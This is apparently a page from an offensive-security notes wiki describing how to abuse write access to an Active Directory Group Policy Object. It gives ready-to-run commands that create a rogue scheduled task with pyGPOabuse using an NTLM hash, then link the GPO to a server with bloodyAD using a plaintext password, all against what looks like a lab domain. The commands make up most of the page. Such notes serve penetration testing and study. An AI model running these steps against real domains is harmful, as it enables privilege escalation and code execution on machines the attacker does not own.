GPO (Group Policy Object)

When you own a object that owns a GPO, you can write to the GPO and link it in the domain.

Creating a rogue task for the GPO

You will need to find the GPO id (can be found in bloodhound)
You will need credentials for the user that controls the GPO

Using pyGPOabuse we can create a task for the GPO:

GitHub - Hackndo/pyGPOAbuse: Partial python implementation of SharpGPOAbuseGitHub

python3 pygpoabuse.py powercorp.local/incendium -hashes :F0529918A0DE5B5B71AB9BBD915B1B01 -gpo-id 'D693F1E4-5666-4259-8BF1-E43CCE1D56F9' -f

Linking GPO

Now that we created a rogue task, we also need to link the GPO to objects. We can do this by remotely by using a Python3 script for example:

GitHub - 1ncendium/pyGPO: Python class for managing Group Policy Object remotelyGitHub

Or we can use BloodyAD:

bloodyAD -d powercorp.local --host 10.10.1.128 -u incendium -p Incendium123 set object SRV01$ GPLink -v CN={2AADC2C9-C75F-45EF-A002-A22E1893FDB5},CN=POLICIES,CN=SYSTEM,DC=POWERCORP,DC=LOCAL

PreviousFile Transfer NextTools

Last updated 1 year ago

hashtagCreating a rogue task for the GPO

hashtagLinking GPO

Creating a rogue task for the GPO

Linking GPO